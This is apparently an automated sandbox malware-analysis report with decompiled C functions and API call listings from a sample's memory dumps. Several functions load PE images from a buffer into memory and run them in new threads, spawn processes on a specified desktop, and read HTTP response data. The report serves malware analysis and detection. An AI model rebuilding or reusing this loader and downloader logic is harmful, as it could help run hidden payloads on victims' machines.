String ID:
API String ID: 1874444438-0
Opcode ID: ad008222c884efdba22402294123df96f914f452aef363a845085fc285a7d0af
Instruction ID: 9980ed3702f6369a7bb57f10b1dab361c29673af765880ecce995c56e91643d4
Opcode Fuzzy Hash: ad008222c884efdba22402294123df96f914f452aef363a845085fc285a7d0af
Instruction Fuzzy Hash: BF61E6709007619FE7248E1CC48475EFBE4FF26758F28456DE8898BB42C324AD96D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 013E8990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E8990(signed char __ecx, void* __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				signed char _t25;
				void* _t31;
				intOrPtr _t34;
				void* _t36;
				void _t38;
				signed char _t39;
				signed char _t41;
				signed int _t47;
				intOrPtr _t50;
				void* _t51;
				signed char _t52;

				_t52 = __ecx;
				_t50 = __ecx + __edx;
				_v8 = _t50;
				while(1) {
					_t47 = 0;
					_t41 = 0;
					_v12 = 0;
					_t39 = 0x80;
					if(_t52 >= _t50) {
						goto L6;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t39 =  *_t52;
						_t52 = _t52 + 1;
						_t47 = _t47 | (_t39 & 0x7f) << _t41;
						if(_t39 >= 0) {
							break;
						}
						_t41 = _t41 + 7;
						if(_t52 < _t50) {
							continue;
						}
						break;
					}
					_v12 = _t47;
					L6:
					_t25 =  !((_t39 & 0x000000ff) >> 7);
					if((_t25 & 0x00000001) != 0) {
						_t25 = _t47 + _t52;
						if(_t25 <= _t50) {
							_v16 = _t52;
							_t52 = _t25;
							_t25 = E013E87C0( &_v16,  &_v28);
							if(_t25 != 0) {
								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								if(_t51 == 0) {
									L1:
									_t50 = _v8;
									continue;
								} else {
									_t31 = E013E1F40(_v24, _v20);
									 *(_t51 + 8) = _t31;
									if(_t31 == 0) {
										L15:
										HeapFree(GetProcessHeap(), 0, _t51);
										goto L1;
									} else {
										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
										if(_t34 == 0) {
											L14:
											VirtualFree( *(_t51 + 8), 0, 0x8000);
											goto L15;
										} else {
											_t36 = CreateThread(0, 0, E013E8880, _t51, 0, 0);
											 *(_t51 + 0x10) = _t36;
											if(_t36 == 0) {
												goto L14;
											} else {
												 *((intOrPtr*)(_t51 + 4)) = _v28;
												_t38 =  *0x13ec274; // 0x0
												 *_t51 = _t38;
												 *0x13ec274 = _t51;
												goto L1;
											}
										}
									}
								}
								L17:
							}
						}
					}
					return _t25;
					goto L17;
				}
			}

0x013e8998
0x013e899b
0x013e899e
0x013e89a6
0x013e89a6
0x013e89a8
0x013e89aa
0x013e89ad
0x013e89b1
0x00000000
0x00000000
0x00000000
0x00000000
0x013e89b3
0x013e89b3
0x013e89b3
0x013e89b5
0x013e89be
0x013e89c2
0x00000000
0x00000000
0x013e89c4
0x013e89c9
0x00000000
0x00000000
0x00000000
0x013e89c9
0x013e89cb
0x013e89ce
0x013e89d4
0x013e89d8
0x013e89de
0x013e89e3
0x013e89e9
0x013e89f2
0x013e89f4
0x013e89fb
0x013e8a12
0x013e8a16
0x013e89a3
0x013e89a3
0x00000000
0x013e8a18
0x013e8a1e
0x013e8a23
0x013e8a28
0x013e8a7b
0x013e8a85
0x00000000
0x013e8a2a
0x013e8a31
0x013e8a33
0x013e8a36
0x013e8a6b
0x013e8a75
0x00000000
0x013e8a38
0x013e8a46
0x013e8a4c
0x013e8a51
0x00000000
0x013e8a53
0x013e8a56
0x013e8a59
0x013e8a5e
0x013e8a60
0x00000000
0x013e8a60
0x013e8a51
0x013e8a36
0x013e8a28
0x00000000
0x013e8a16
0x013e89fb
0x013e89e3
0x013e8a96
0x00000000
0x013e8a96

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,013E8F82), ref: 013E8A05
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 013E8A0C
CreateThread.KERNEL32(00000000,00000000,013E8880,00000000,00000000,00000000), ref: 013E8A46
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,013E8F82), ref: 013E8A75
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,013E8F82), ref: 013E8A7E
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,013E8F82), ref: 013E8A85

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
String ID:
API String ID: 1073023709-0
Opcode ID: b11584c57b8ee4cbf1f8698f4c4be25c99450b914c0d323ee997f8db4f928d8c
Instruction ID: 2866032411e6cdb59b10221b85ec34147d0639a421887a662e56f555374a301a
Opcode Fuzzy Hash: b11584c57b8ee4cbf1f8698f4c4be25c99450b914c0d323ee997f8db4f928d8c
Instruction Fuzzy Hash: FB31D371E40716ABEB21DF69D849BADBBF8BB84704F148195EA45DB3C4EB70D401CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E2180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E013E2180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
				char _v8;
				struct _STARTUPINFOW _v76;
				int _t29;
				WCHAR* _t31;
				int _t35;
				void* _t36;

				_t35 = 0;
				_t31 = __ecx;
				memset( &_v76, 0, 0x44);
				_t36 = _a4;
				_v76.cb = 0x44;
				if(_t36 == 0) {
					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
				} else {
					_t5 = _t35 + 0x10; // 0x10
					E013E1830(0x13e1030, _t5, 0x47deb7fb,  &_a4);
					_v76.lpDesktop = _a4;
					_push(0);
					_push(_t36);
					_push( &_v8);
					if( *0x13ec21c() != 0) {
						_t29 =  *0x13ec04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
						_t35 = _t29;
						 *0x13ec220(_v8);
					}
					HeapFree(GetProcessHeap(), 0, _a4);
					return _t35;
				}
			}

0x013e218b
0x013e2192
0x013e2194
0x013e219a
0x013e21a0
0x013e21a9
0x013e223e
0x013e21ab
0x013e21b9
0x013e21bc
0x013e21c7
0x013e21cd
0x013e21ce
0x013e21cf
0x013e21d8
0x013e21f0
0x013e21f9
0x013e21fb
0x013e21fb
0x013e220d
0x013e221b
0x013e221b

APIs

memset.NTDLL ref: 013E2194
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,013EA52C), ref: 013E2232

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E2206
HeapFree.KERNEL32(00000000), ref: 013E220D

Strings

D, xrefs: 013E21A0

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCreateFreememset
String ID: D
API String ID: 3667606640-2746444292
Opcode ID: 127045d5c97eb7660a873159f48ae5390743ada0c3e23478abfd7d72a61f6d64
Instruction ID: 4ba8673b7355afe9f8e9b52b0ec50764c40e1276f25408b678572b2e9630cc4b
Opcode Fuzzy Hash: 127045d5c97eb7660a873159f48ae5390743ada0c3e23478abfd7d72a61f6d64
Instruction Fuzzy Hash: 8B112C76600318BBEB209A95EC48EDF7FBCEF85755F044025FA08DA280D6319A55CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 013E23F0, Relevance: 7.6, APIs: 5, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 013E2422
RtlAllocateHeap.NTDLL(00000000), ref: 013E2429
memcpy.NTDLL(013E8583,?,?), ref: 013E2467
GetProcessHeap.KERNEL32(00000000,013E8583), ref: 013E250A
HeapFree.KERNEL32(00000000), ref: 013E2511

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: 42d45f3a0ba0a95bab2b85be254ead311d656362f1a5129bd5348d5b428d9480
Instruction ID: de4ab11a9509e8c3cd5eb653335a8feb6414752c15e0f188ddb235e3bf876880
Opcode Fuzzy Hash: 42d45f3a0ba0a95bab2b85be254ead311d656362f1a5129bd5348d5b428d9480
Instruction Fuzzy Hash: F0410972900309AFEF21CFA5DD48FAEBBFDEB44304F144169E915EA191D7719A049B60

Uniqueness

Uniqueness Score: -1.00%

Function 013E2530, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,013E8644,?), ref: 013E256D
RtlAllocateHeap.NTDLL(00000000), ref: 013E2574
memcpy.NTDLL(013E8644,?,?), ref: 013E25AE
GetProcessHeap.KERNEL32(00000000,013E8644), ref: 013E260C
HeapFree.KERNEL32(00000000), ref: 013E2613

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: fc0773314da6eadf6069cbfddb6f252f1ee51f93585524d1ef862cdf6f2c0474
Instruction ID: deed2b4243cdaf1c859b72f9d96f01afe843bf57dce289772eb22bbf149ed46f
Opcode Fuzzy Hash: fc0773314da6eadf6069cbfddb6f252f1ee51f93585524d1ef862cdf6f2c0474
Instruction Fuzzy Hash: 36314D72640315AFEB318FA8DC89B9EBBEDFB08719F100161F905DA1D4D771DA509B90

Uniqueness

Uniqueness Score: -1.00%

Function 013E8290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E8290(int* __ecx, signed int _a8) {
				intOrPtr _t66;
				int* _t88;
				signed int _t89;
				void* _t90;

				_t89 = _a8;
				_t88 = __ecx;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = _t89;
				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
				if((_t89 & 0x00008000) == 0) {
					_t17 = _t88 + 0x29272; // 0x29272
					memset(_t17, 0, 0x10000);
					_t90 = _t90 + 0xc;
				}
				_t18 = _t88 + 0x9273; // 0x9273
				 *(_t88 + 0x44) = 0;
				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
				_t21 = _t88 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
				_t23 = _t88 + 0x39272; // 0x39272
				_t66 = _t23;
				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
				_t26 = _t88 + 0x8192; // 0x8192
				 *(_t88 + 0x40) = 0;
				 *(_t88 + 0x3c) = 0;
				 *(_t88 + 0x24) = 0;
				 *(_t88 + 0x20) = 0;
				 *(_t88 + 0x1c) = 0;
				 *(_t88 + 0x68) = 0;
				 *(_t88 + 0x48) = 0;
				 *(_t88 + 0x64) = 0;
				 *(_t88 + 0x60) = 0;
				 *(_t88 + 0x5c) = 0;
				 *(_t88 + 0x58) = 0;
				 *((intOrPtr*)(_t88 + 0x38)) = 8;
				 *(_t88 + 0x6c) = 0;
				 *(_t88 + 0x54) = 0;
				 *(_t88 + 0x50) = 0;
				 *(_t88 + 0x4c) = 0;
				 *((intOrPtr*)(_t88 + 0x18)) = 1;
				 *(_t88 + 0x70) = 0;
				 *(_t88 + 0x74) = 0;
				 *(_t88 + 0x78) = 0;
				 *(_t88 + 0x7c) = 0;
				 *(_t88 + 0x80) = 0;
				 *(_t88 + 0x84) = 0;
				 *(_t88 + 0x88) = 0;
				 *(_t88 + 0x8c) = 0;
				memset(_t26, 0, 0x240);
				_t52 = _t88 + 0x83d2; // 0x83d2
				memset(_t52, 0, 0x40);
				return 0;
			}

0x013e8294
0x013e82aa
0x013e82bc
0x013e82c2
0x013e82c9
0x013e82cc
0x013e82d4
0x013e82ef
0x013e82f8
0x013e82ff
0x013e8308
0x013e830e
0x013e830e
0x013e8311
0x013e8317
0x013e831e
0x013e8321
0x013e8327
0x013e832a
0x013e832a
0x013e8335
0x013e8338
0x013e833b
0x013e8344
0x013e834b
0x013e8352
0x013e8359
0x013e8360
0x013e8367
0x013e836e
0x013e8375
0x013e837c
0x013e8383
0x013e838a
0x013e8391
0x013e8398
0x013e839f
0x013e83a6
0x013e83ad
0x013e83b4
0x013e83bb
0x013e83c2
0x013e83c9
0x013e83d0
0x013e83d7
0x013e83e1
0x013e83eb
0x013e83f5
0x013e83ff
0x013e8407
0x013e8410
0x013e841e

APIs

memset.NTDLL ref: 013E8308
memset.NTDLL ref: 013E83FF
memset.NTDLL ref: 013E8410

Strings

VUUU, xrefs: 013E82CF
VUUU, xrefs: 013E8297

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: memset
String ID: VUUU$VUUU
API String ID: 2221118986-3149182767
Opcode ID: 3c88033ab0eb1af5039addac8c27e598b81de3cedffd13c61e145f51b6095a98
Instruction ID: 9bd451d366e0755e2bd9d97a214fca763ca47c26461a7bac90c66a3daebedbd1
Opcode Fuzzy Hash: 3c88033ab0eb1af5039addac8c27e598b81de3cedffd13c61e145f51b6095a98
Instruction Fuzzy Hash: D441B7B1600A06BBE3188F65C469782FBE4FF44708F148219D6599BB80D7BAF168CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 013E99A0, Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 013E1830: GetProcessHeap.KERNEL32(00000008,013E9F6B,00000000,00000000,013E1004,?,013E15F4,4DBAC13F,013E9F6B,?,00000000), ref: 013E1844
Part of subcall function 013E1830: RtlAllocateHeap.NTDLL(00000000,?,013E15F4), ref: 013E184B

_snwprintf.NTDLL ref: 013E99E3
GetProcessHeap.KERNEL32(00000000,013E8F37), ref: 013E9A5E
HeapFree.KERNEL32(00000000), ref: 013E9A65
GetProcessHeap.KERNEL32(00000000,?), ref: 013E9A70
HeapFree.KERNEL32(00000000), ref: 013E9A77

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate_snwprintf
String ID:
API String ID: 2579732983-0
Opcode ID: e78fb8a9ee2ede9751fba40a252486e7a5fe568c733927c0cb31514cbc459221
Instruction ID: 491a491837c2cb0c8193624e52a6c0953234cd53f8a844cf4f1ff84195497245
Opcode Fuzzy Hash: e78fb8a9ee2ede9751fba40a252486e7a5fe568c733927c0cb31514cbc459221
Instruction Fuzzy Hash: FE217C71A40318BBFF309BE0AC4EFDD7BADAB08709F101051FA09E91D5D7B1AA448B51

Uniqueness

Uniqueness Score: -1.00%

Function 013E8AA0, Relevance: 7.5, APIs: 5, Instructions: 49
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E8AA0() {
				int _t8;
				void* _t16;
				void* _t17;

				_t17 =  *0x13ec274; // 0x0
				if(_t17 != 0) {
					do {
						_t8 =  *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0xb, 0);
						_t17 =  *_t17;
					} while (_t17 != 0);
					_t17 =  *0x13ec274; // 0x0
				}
				_t16 = 0x13ec274;
				while(_t17 != 0) {
					_t8 = WaitForSingleObject( *(_t17 + 0x10), 0xffffffff);
					if(_t8 == 0x102) {
						_t16 = _t17;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t17 + 0xc))))( *(_t17 + 8), 0, 0);
						VirtualFree( *(_t17 + 8), 0, 0x8000);
						CloseHandle( *(_t17 + 0x10));
						 *_t16 =  *_t17;
						_t8 = HeapFree(GetProcessHeap(), 0, _t17);
					}
					_t17 =  *_t16;
				}
				return _t8;
			}

0x013e8aa1
0x013e8aaa
0x013e8ab0
0x013e8aba
0x013e8abc
0x013e8abe
0x013e8ac2
0x013e8ac2
0x013e8ac8
0x013e8acf
0x013e8ad6
0x013e8ae1
0x013e8b1e
0x013e8ae3
0x013e8aed
0x013e8af9
0x013e8b02
0x013e8b0d
0x013e8b16
0x013e8b16
0x013e8b20
0x013e8b22
0x013e8b28

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,013E9315,013E9286), ref: 013E8AD6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 013E8AF9
CloseHandle.KERNEL32(?), ref: 013E8B02
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E8B0F
HeapFree.KERNEL32(00000000), ref: 013E8B16

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: 138c756c923049224de8e63f3b72885b7f7fe5b278101355ee1b9bc62b6ab506
Instruction ID: ae56f9438c798654e6397b9237a9d6451ae17b4b6a8d2ccec2008ec27d75ac39
Opcode Fuzzy Hash: 138c756c923049224de8e63f3b72885b7f7fe5b278101355ee1b9bc62b6ab506
Instruction Fuzzy Hash: 50012932D40721ABEE314F58DC09B0A7BE9BF45B20F154A54FAA6AB6D4C770A8418B80

Uniqueness

Uniqueness Score: -1.00%

Function 013E88B0, Relevance: 7.5, APIs: 5, Instructions: 40
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013E88B0(long __ecx) {
				int _t6;
				long _t13;
				void* _t15;
				void* _t16;

				_t16 =  *0x13ec274; // 0x0
				_t13 = __ecx;
				_t15 = 0x13ec274;
				while(_t16 != 0) {
					_t6 = WaitForSingleObject( *(_t16 + 0x10), _t13);
					if(_t6 == 0x102) {
						_t15 = _t16;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t16 + 0xc))))( *(_t16 + 8), 0, 0);
						VirtualFree( *(_t16 + 8), 0, 0x8000);
						CloseHandle( *(_t16 + 0x10));
						 *_t15 =  *_t16;
						_t6 = HeapFree(GetProcessHeap(), 0, _t16);
					}
					_t16 =  *_t15;
				}
				return _t6;
			}

0x013e88b2
0x013e88b8
0x013e88bb
0x013e88c2
0x013e88c8
0x013e88d3
0x013e8910
0x013e88d5
0x013e88df
0x013e88eb
0x013e88f4
0x013e88ff
0x013e8908
0x013e8908
0x013e8912
0x013e8914
0x013e891b

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,000DBBA0,?,013E8F3E), ref: 013E88C8
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,013E8F3E), ref: 013E88EB
CloseHandle.KERNEL32(?,?,000DBBA0,?,013E8F3E), ref: 013E88F4
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,013E8F3E), ref: 013E8901
HeapFree.KERNEL32(00000000,?,000DBBA0,?,013E8F3E), ref: 013E8908

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: 1a4eb71975731d236cfed71ca23e237ee6b256b5f7e198be6d12d412761c80d2
Instruction ID: 9c0c0e72f19b0302995395a1761e20d12cfa76c544d53f4ca48e0ab33a78ceab
Opcode Fuzzy Hash: 1a4eb71975731d236cfed71ca23e237ee6b256b5f7e198be6d12d412761c80d2
Instruction Fuzzy Hash: 82F03C32A00720AFEB315BA8DC4DB1A7BE9EF44711F111554FA91EB2E4C770AC409B90

Uniqueness

Uniqueness Score: -1.00%

Function 013E1E50, Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E013E1E50(void* __ecx, void** __edx, long* _a4) {
				long _v8;
				long _v12;
				long _v16;
				void** _v20;
				long _t36;
				void* _t42;
				long _t46;
				void* _t49;
				void* _t52;
				void* _t53;

				_push(0);
				_v20 = __edx;
				_push( &_v8);
				_v8 = 4;
				_t42 = __ecx;
				_push( &_v16);
				_push(0x20000005);
				_push( *((intOrPtr*)(__ecx + 8)));
				if( *0x13ec238() == 0) {
					return 0;
				} else {
					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
					if(_t49 == 0) {
						return 0;
					} else {
						_v8 = 0;
						_v12 = 0;
						_t53 =  *0x13ec248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
						if(_t53 == 0) {
							L7:
							HeapFree(GetProcessHeap(), 0, _t49);
							if(_t53 != 0) {
								goto L8;
							}
						} else {
							while(1) {
								_t36 = _v12;
								if(_t36 == 0) {
									break;
								}
								_t46 = _v8 + _t36;
								_v8 = _t46;
								_t53 =  *0x13ec248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
								if(_t53 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L9;
							}
							if(_t53 != 0) {
								L8:
								 *_v20 = _t49;
								 *_a4 = _v8;
							} else {
								goto L7;
							}
						}
						L9:
						return _t53;
					}
				}
			}

0x013e1e57
0x013e1e5c
0x013e1e5f
0x013e1e63
0x013e1e6a
0x013e1e6c
0x013e1e6d
0x013e1e72
0x013e1e7d
0x013e1f30
0x013e1e83
0x013e1e96
0x013e1e9a
0x013e1f29
0x013e1ea0
0x013e1ea4
0x013e1eaf
0x013e1ec0
0x013e1ec4
0x013e1ef8
0x013e1f02
0x013e1f0a
0x00000000
0x00000000
0x013e1ec6
0x013e1ec6
0x013e1ec6
0x013e1ecb
0x00000000
0x00000000
0x013e1ed0
0x013e1edb
0x013e1eec
0x013e1ef0
0x00000000
0x013e1ef2
0x00000000
0x013e1ef2
0x00000000
0x013e1ef0
0x013e1ef6
0x013e1f0c
0x013e1f12
0x013e1f17
0x00000000
0x00000000
0x00000000
0x013e1ef6
0x013e1f19
0x013e1f21
0x013e1f21
0x013e1e9a

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,013E8631), ref: 013E1E89
RtlAllocateHeap.NTDLL(00000000), ref: 013E1E90
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013E1EFB
HeapFree.KERNEL32(00000000), ref: 013E1F02

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: b59081d69133950255f503ab6bd6785041778b56f688136bc50a7a16488b73b7
Instruction ID: 913696632a9e536da2cc5f590793deedb1e37ba2d92e7c2c13006abbb73b4b46
Opcode Fuzzy Hash: b59081d69133950255f503ab6bd6785041778b56f688136bc50a7a16488b73b7
Instruction Fuzzy Hash: B3212F75A00318AFEB218F98D848BAEBBFCEB48715F040195FD09E7284D7319E50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E8420, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E013E8420(intOrPtr __ecx, signed int __edx, long* _a4) {
				intOrPtr _v8;
				void* _t20;
				signed int _t28;
				signed int _t36;
				long _t44;
				void* _t45;

				_t36 = __edx;
				_t26 = _a4;
				_v8 = __ecx;
				_t28 = __edx * 0x6e;
				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
				 *_a4 = _t44;
				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
				_t45 = _t20;
				if(_t45 == 0) {
					return _t20;
				} else {
					_push(_t28);
					if(E013E29B0(_t45, _t26, _v8, _t36) == 0) {
						return _t45;
					}
					HeapFree(GetProcessHeap(), 0, _t45);
					return 0;
				}
			}

0x013e8429
0x013e842b
0x013e8433
0x013e8438
0x013e8460
0x013e8466
0x013e846f
0x013e8475
0x013e8479
0x013e84b1
0x013e847b
0x013e847b
0x013e848e
0x00000000
0x013e84a9
0x013e849a
0x013e84a8
0x013e84a8

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 013E8468
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 013E846F

Part of subcall function 013E29B0: memset.NTDLL ref: 013E29C4

GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 013E8493
